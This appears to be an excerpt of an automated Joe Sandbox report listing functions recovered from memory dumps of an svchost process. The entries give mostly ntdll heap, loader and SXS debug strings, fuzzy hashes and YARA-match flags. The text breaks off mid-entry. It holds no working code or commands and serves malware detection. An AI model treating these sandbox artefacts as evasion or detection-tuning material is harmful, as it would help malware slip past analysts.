                                            • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                            • API String ID: 0-475462383
                                            • Opcode ID: 91b1a966744853cccb95c4e314677ddec891a93ff230d156f888c75fde70f324
                                            • Instruction ID: 680eb332a7dee1985c71fd4fa187afdd8fdb8fa68a86f553cd3659e7cfe6deaa
                                            • Opcode Fuzzy Hash: 91b1a966744853cccb95c4e314677ddec891a93ff230d156f888c75fde70f324
                                            • Instruction Fuzzy Hash: 8331F77A644701AFC224EF2CDE45E2AB7A4EF84B24F04095AF8855B391D724EC04C7A2
                                            Function 03AB9C32 Relevance: 6.8, Strings: 5, Instructions: 542COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$AVRF: Verifier .dlls must not have thread locals$KnownDllPath$L$\KnownDlls32
                                            • API String ID: 0-3127649145
                                            • Opcode ID: 6c7b9b8d59b3b4b2eacc8e70ff0b64f6a69016f889df09f1b71f539f1060dab9
                                            • Instruction ID: 3206126e9fc6a719954f92e822b291ea42a7303bf0b96b2a9f26db4c3c63b0c3
                                            • Opcode Fuzzy Hash: 6c7b9b8d59b3b4b2eacc8e70ff0b64f6a69016f889df09f1b71f539f1060dab9
                                            • Instruction Fuzzy Hash: AE325675A007199BDB60DF25CD88BDAB7F8FF48300F1046EAE509AB251DB70AA84CF50
                                            Function 03A49950 Relevance: 6.7, Strings: 5, Instructions: 462COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                            • API String ID: 0-3393094623
                                            • Opcode ID: 33ae96f6f1ba073717aad32fb8344dc0e30a9e74e46f4e1ddd09baa487c9d5b6
                                            • Instruction ID: f9b7b65b0dadf3073d1539f0a459caae53b5e913938f7574ea912c36683f73f8
                                            • Opcode Fuzzy Hash: 33ae96f6f1ba073717aad32fb8344dc0e30a9e74e46f4e1ddd09baa487c9d5b6
                                            • Instruction Fuzzy Hash: 0A0257719083418FD720CF64C184BABBBE5BFC9704F48892FE9999B250E770D855CBA2
                                            Function 03A551EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                            Download Yara Rule
                                            Strings
                                            • Kernel-MUI-Number-Allowed, xrefs: 03A55247
                                            • Kernel-MUI-Language-SKU, xrefs: 03A5542B
                                            • Kernel-MUI-Language-Allowed, xrefs: 03A5527B
                                            • Kernel-MUI-Language-Disallowed, xrefs: 03A55352
                                            • WindowsExcludedProcs, xrefs: 03A5522A
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                            • API String ID: 0-258546922
                                            • Opcode ID: b0ce2ea30638340fdadfcbe1b97d5f839abe5b706f779510a39353db82819641
                                            • Instruction ID: 8167ae1fbec74c7da047b3ce5bdb098d24b411ada9967fa97366f6c87b0d94de
                                            • Opcode Fuzzy Hash: b0ce2ea30638340fdadfcbe1b97d5f839abe5b706f779510a39353db82819641
                                            • Instruction Fuzzy Hash: 4AF13B76D00218EFCF15DF98D984AAEBBF9FF49650F15405BE902AB250D7749E01CBA0
                                            Function 03AB4F40 Relevance: 6.5, Strings: 5, Instructions: 246COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                            • API String ID: 0-2518169356
                                            • Opcode ID: 41d542eff2bd4030d099f69b2eb153f925089474e372be50fdf15d409c015334
                                            • Instruction ID: 507e0aa0a03d4a5a1c344dde915725ba08941310cd5429f481a40428b6380a5b
                                            • Opcode Fuzzy Hash: 41d542eff2bd4030d099f69b2eb153f925089474e372be50fdf15d409c015334
                                            • Instruction Fuzzy Hash: 6991BF76D006199FCB20CFA9C881AFEB7B8EF4A710F59416AE811EB352D735D901CB90
                                            Function 03A5D7B0 Relevance: 6.4, Strings: 5, Instructions: 151COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-1975516107
                                            • Opcode ID: b38e976ea0c6e8cb0678a297fbe06a229d7379977adf3577e89304f1b9716c4e
                                            • Instruction ID: 29bacc90396f13a2dd5c2222613d488ca9e0229281b992e807e20ee22a74675a
                                            • Opcode Fuzzy Hash: b38e976ea0c6e8cb0678a297fbe06a229d7379977adf3577e89304f1b9716c4e
                                            • Instruction Fuzzy Hash: 6A51EE75A00345DFDB24EFA8C68479DFBB1BF49318F28425BE8056B6A5D774A881CB80
                                            Function 03A276B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                            • API String ID: 0-3061284088
                                            • Opcode ID: 0e107cebf052e6cfb8a99e752ad672cb97568d2f69a4711ed8f6069d5db4ce08
                                            • Instruction ID: 7ec83e9d1a2cd6e4eb0ffcfb69d5360722ebd41f449ce80cfa2d314a7c9a3658
                                            • Opcode Fuzzy Hash: 0e107cebf052e6cfb8a99e752ad672cb97568d2f69a4711ed8f6069d5db4ce08
                                            • Instruction Fuzzy Hash: 8A01D876148660EFD22AF71DE519F96BBE4EB42B70F18405BE0104BAA2CBA59C84D570
                                            Function 03A470C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                            • API String ID: 0-3178619729
                                            • Opcode ID: 5a5605a92d66b8095c5b4ddb10633a8a5322f00d3f0709557a2cc598600acad1
                                            • Instruction ID: 5c720f475052159e6a3f4be9f1f10e72eb7c28b4cfc0f7f7fac978905813a9a4
                                            • Opcode Fuzzy Hash: 5a5605a92d66b8095c5b4ddb10633a8a5322f00d3f0709557a2cc598600acad1
                                            • Instruction Fuzzy Hash: 69139D70A00655DFDB25CF68C4807A9FBF5BF89304F1881AED859AB381D73AA945CF90
                                            Function 03A41070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-3570731704
                                            • Opcode ID: 1cb36fba9d1f4bec82de3208c3d52f0a6281a7d16f338364539868be9ace5bb4
                                            • Instruction ID: 6cafc36fdc16cf96f1734caedb69ab4e6aab6f98a775d083496654a5038cbf6a
                                            • Opcode Fuzzy Hash: 1cb36fba9d1f4bec82de3208c3d52f0a6281a7d16f338364539868be9ace5bb4
                                            • Instruction Fuzzy Hash: 43923875E00228CFEB25CB18C981BA9B7B5BF85314F1981EBE949AB350D7349E80CF51
                                            Function 03A4A840 Relevance: 5.4, Strings: 4, Instructions: 358COMMON
                                            Download Yara Rule
                                            Strings
                                            • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 03A97D39
                                            • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 03A97D03
                                            • SsHd, xrefs: 03A4A885
                                            • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 03A97D56
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                            • API String ID: 0-2905229100
                                            • Opcode ID: d9367a8ffcf87c15cd14c72590af554d5416ad288f675ececd56713960db17fb
                                            • Instruction ID: 9e213cd229c4ac4a1af075da0219763e25527fa065368dafa9c31d95ac12252d
                                            • Opcode Fuzzy Hash: d9367a8ffcf87c15cd14c72590af554d5416ad288f675ececd56713960db17fb
                                            • Instruction Fuzzy Hash: 93D17C76A402199BDF24CF98C9806ADF7B5FF88310F19416BE845AB352D371D951CBA0
                                            Function 03A43D40 Relevance: 5.4, Strings: 3, Instructions: 1603COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                            • API String ID: 0-3178619729
                                            • Opcode ID: b8d3ee56b7d18420d42213645f920625798aa944010edd581d22cdfdb8a55610
                                            • Instruction ID: 022eb5a9025751643c2a21e450b86c452660aa0534101605dc41ab9c792221bf
                                            • Opcode Fuzzy Hash: b8d3ee56b7d18420d42213645f920625798aa944010edd581d22cdfdb8a55610
                                            • Instruction Fuzzy Hash: 28E29074A00655DFDB28CF69C490BA9FBF1FF89304F1881AED849AB385D735A845CB90
                                            Function 03A3A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                            • API String ID: 0-379654539
                                            • Opcode ID: 496e732f0d58218b9c070a2a63866c1cab30399565341ce71f91cef90a6f1142
                                            • Instruction ID: 584432be85fe13b77e3d5cf4e764cb4d7bb944404988cc87f2b08d69c3087c2e
                                            • Opcode Fuzzy Hash: 496e732f0d58218b9c070a2a63866c1cab30399565341ce71f91cef90a6f1142
                                            • Instruction Fuzzy Hash: A8C177742083969FDB11CF28C144B6AB7F4AF86704F04896FF8D69B250E739C949CB56
                                            Function 03A40C00 Relevance: 5.3, Strings: 4, Instructions: 260COMMON
                                            Download Yara Rule
                                            Strings
                                            • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 03A954ED
                                            • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 03A955AE
                                            • HEAP: , xrefs: 03A954E0, 03A955A1
                                            • HEAP[%wZ]: , xrefs: 03A954D1, 03A95592
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                            • API String ID: 0-1657114761
                                            • Opcode ID: 006ef1e2a29b20a99e4d5047df1b0c5afa3263a40c3f72ea3193dff072ae5c7d
                                            • Instruction ID: 4a064eaf1d898d18c847a18d04cc775828ad5146751f57b2763fb9dbc82507ee
                                            • Opcode Fuzzy Hash: 006ef1e2a29b20a99e4d5047df1b0c5afa3263a40c3f72ea3193dff072ae5c7d
                                            • Instruction Fuzzy Hash: CAA1E034A04205DFDB24DF28C845BBAFBF5AF95300F18866FD5968B782D734A844EB90
                                            Function 03A6273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                            Download Yara Rule
                                            Strings
                                            • SXS: %s() passed the empty activation context, xrefs: 03AA21DE
                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 03AA22B6
                                            • .Local, xrefs: 03A628D8
                                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 03AA21D9, 03AA22B1
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                            • API String ID: 0-1239276146
                                            • Opcode ID: 89297d2bfd422c8abda2032f2ae83d2927a180f4034677c3a950d4331de27cbb
                                            • Instruction ID: d00d9de2c67835240671e6311fa6dd06428eb94ea12ffee7cfe1f8a5815cedb7
                                            • Opcode Fuzzy Hash: 89297d2bfd422c8abda2032f2ae83d2927a180f4034677c3a950d4331de27cbb
                                            • Instruction Fuzzy Hash: F7A180369402299BDB24CF68DC84BA9B3B5BF58314F1949EFD848AB351D7309E84CF90
                                            Function 004026A0 Relevance: 5.2, Strings: 4, Instructions: 196COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2013386814.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: VUUU$gfff$gfff$gfff
                                            • API String ID: 0-1210399089
                                            • Opcode ID: 05720a07e741a595b434b88e97bfea4212d20f882de4e4fe9bdfd04c17e05d59
                                            • Instruction ID: f5f1e020c2e68594e4ca50f68dc5c3c4b08034def63b0ad0c19a24daa7b57edf
                                            • Opcode Fuzzy Hash: 05720a07e741a595b434b88e97bfea4212d20f882de4e4fe9bdfd04c17e05d59
                                            • Instruction Fuzzy Hash: 08514E77B0001A07DB2C981E9F582B6664797E4310B59833BDC8AEF3D5E8BDED425289
                                            Function 03A2F626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                            • API String ID: 0-2586055223
                                            • Opcode ID: e9c0ff3c72fd4e6c746eaa3a1e8d3c732e6b67b9c0cadc108a075ed893497d1b
                                            • Instruction ID: aa296583c16daa479120f820bc5dcb9d0a36c31c6ecbe388f68d05c407762d64
                                            • Opcode Fuzzy Hash: e9c0ff3c72fd4e6c746eaa3a1e8d3c732e6b67b9c0cadc108a075ed893497d1b
                                            • Instruction Fuzzy Hash: 3561E076205780AFD721EB28C944F67BBF9EF84714F08086AF9558B391D734E941CB61
                                            Function 00402698 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2013386814.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: VUUU$gfff$gfff$gfff
                                            • API String ID: 0-1210399089
                                            • Opcode ID: 1aa470826c6ecd063cb51aa641d488d9440a8b162cdb8d333120d3c1cdf88c3d
                                            • Instruction ID: 17f8f94bda49646ffc40bdf81e21c07f5f984f206102012cde664a6640d2a196
                                            • Opcode Fuzzy Hash: 1aa470826c6ecd063cb51aa641d488d9440a8b162cdb8d333120d3c1cdf88c3d
                                            • Instruction Fuzzy Hash: 6F517A77B0010A07DB2C881E9F582BA614797E4310B59C33BDC89EF3D1E8BCED025289
                                            Function 03AE11A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                            • API String ID: 0-336120773
                                            • Opcode ID: 4b0d010567552ee9ff7948e19382012f010a8f1fc6dc0d23015e9d7e45f874f2
                                            • Instruction ID: 5640fa5e1c611e059691ae399d2b88f17617e2d2565026375bfdb02ca5201fef
                                            • Opcode Fuzzy Hash: 4b0d010567552ee9ff7948e19382012f010a8f1fc6dc0d23015e9d7e45f874f2
                                            • Instruction Fuzzy Hash: 6F31CB35600220EFD719EB98CD85FAAB7E8FF09764F18016BE451DB291E670EC41CA65
                                            Function 03A29148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                            • API String ID: 0-1391187441
                                            • Opcode ID: 3b4eac729346533caa0001fe593226c7643f048062a405b13bbb52c5ab3a4456
                                            • Instruction ID: b6a9564966e3799282a2e4182c10809bb47ef469efacd18763b38071f4bfc628
                                            • Opcode Fuzzy Hash: 3b4eac729346533caa0001fe593226c7643f048062a405b13bbb52c5ab3a4456
                                            • Instruction Fuzzy Hash: D4316076A00214EFCB11EB5AC985FAFBBB9EF45B20F14405BE815AB291D770ED40CA71
                                            Function 03A429A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                            Download Yara Rule
                                            Strings
                                            • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 03A4327D
                                            • HEAP: , xrefs: 03A43264
                                            • HEAP[%wZ]: , xrefs: 03A43255
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                            • API String ID: 0-617086771
                                            • Opcode ID: 3cc228a040e33d32adc04e4d6deb8ebdf9ab513057718a3e064db2683bee3292
                                            • Instruction ID: b14979d86a1559113c921aa3d9c36d5cd517f9b81941745c007e2f4a2d3c5e5b
                                            • Opcode Fuzzy Hash: 3cc228a040e33d32adc04e4d6deb8ebdf9ab513057718a3e064db2683bee3292
                                            • Instruction Fuzzy Hash: 2B929A74A042499FDF25CF68C5447AEBBF1EF89300F1884AEE899AB391D735A941CF50
                                            Function 03A41F92 Relevance: 4.3, Strings: 3, Instructions: 563COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                            • API String ID: 0-3178619729
                                            • Opcode ID: ea3eff02f1e1ed18900be1174038b8a668a61c27a6ee3f774df4aecb9df3d2e2
                                            • Instruction ID: 6ea9363dd267c2726302b933c256626521b982c24f16fff8d4d22345f4f04886
                                            • Opcode Fuzzy Hash: ea3eff02f1e1ed18900be1174038b8a668a61c27a6ee3f774df4aecb9df3d2e2
                                            • Instruction Fuzzy Hash: A522FB70A00641AFEB26CF28C495B7AFBF5EF46704F18849BE4559B392E735E881CB50
                                            Function 03A40770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-4253913091
                                            • Opcode ID: 2f60c4a7edbeed5a55c03bf9c2660473839fa7f6795f28e76cc49a89ffac88f5
                                            • Instruction ID: 3347c6cf4e671669eb5ed9f59dc216b8eecbff1f1a6b9277a192a906454854d8
                                            • Opcode Fuzzy Hash: 2f60c4a7edbeed5a55c03bf9c2660473839fa7f6795f28e76cc49a89ffac88f5
                                            • Instruction Fuzzy Hash: 36F1DE34A00605DFEB19DF68C980B6AF7F5FF85304F1881AAE516AB391D734E981CB90
                                            Function 03A31460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                            Download Yara Rule
                                            Strings
                                            • HEAP: , xrefs: 03A31596
                                            • HEAP[%wZ]: , xrefs: 03A31712
                                            • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 03A31728
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                            • API String ID: 0-3178619729
                                            • Opcode ID: dc43e685c58d0b7ef1f9aa47ca2879b7416dc398e1b35d61aadc38441cc70935
                                            • Instruction ID: 610709e2ce17c858ad566b8fec25c91aa3b42083f67f7ac14f69ba074d6f8fc5
                                            • Opcode Fuzzy Hash: dc43e685c58d0b7ef1f9aa47ca2879b7416dc398e1b35d61aadc38441cc70935
                                            • Instruction Fuzzy Hash: 2EE1C070A046469FDB29EF68C491B7ABBF5AF4A300F18855FF4968B345E734E940CB50
                                            Function 03A3B6C0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                            • API String ID: 0-1145731471
                                            • Opcode ID: 538e78fdc4723a15f64f9a9e6155d2b102e898184a64017ee3edb9e8f0c234f6
                                            • Instruction ID: 1da94759f46221035dff2fa4eafc4e17346b3cece483057297a480bc1dc9850c
                                            • Opcode Fuzzy Hash: 538e78fdc4723a15f64f9a9e6155d2b102e898184a64017ee3edb9e8f0c234f6
                                            • Instruction Fuzzy Hash: F8B16A79A056449FEF25CF69C980BADB7B6EF45714F1889AFE451EB380D730A840CB60
                                            Function 03AB368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                            • API String ID: 0-2391371766
                                            • Opcode ID: 5ca40aac55d75cf5be7765cf2c88af4a432b945f204f85d6281839f97fca0dfc
                                            • Instruction ID: 23ee4bd00c63a88fc5779ea660b2770205c6327d03870154d0e23e6c51999e3b
                                            • Opcode Fuzzy Hash: 5ca40aac55d75cf5be7765cf2c88af4a432b945f204f85d6281839f97fca0dfc
                                            • Instruction Fuzzy Hash: 03B19D79604341AFEB21DF54C980BABB7FCAB49714F15092FFA409B291D771E844CB92
                                            Function 03A56962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $@
                                            • API String ID: 0-1077428164
                                            • Opcode ID: e61d0e1ced47722e557a0094eba9a686f4cc790bf5d934f84ceb587736316d73
                                            • Instruction ID: 2c2a95ef37f5fc73e27ac2bd630dcec5057f28a74874ed75174b36e260d49be9
                                            • Opcode Fuzzy Hash: e61d0e1ced47722e557a0094eba9a686f4cc790bf5d934f84ceb587736316d73
                                            • Instruction Fuzzy Hash: 05C27D716087419FEB25CF24C880BABBBE5AF88754F08896FF989E7250D735D804CB52
                                            Function 03A2A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: FilterFullPath$UseFilter$\??\
                                            • API String ID: 0-2779062949
                                            • Opcode ID: ef7e99afa1ae6a867ff19f4e9d6456bc6a91a0ad7d7af920c152457d35af27ac
                                            • Instruction ID: c4276869602d242dd173edf97e8cda97989e8d72cd8941fe8613abd6a72309ce
                                            • Opcode Fuzzy Hash: ef7e99afa1ae6a867ff19f4e9d6456bc6a91a0ad7d7af920c152457d35af27ac
                                            • Instruction Fuzzy Hash: 7FA18C759012299BDB31EF24CD88BEAF7B8EF44710F1405EAE909AB250D7359E85CF60
                                            Function 03AC36EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
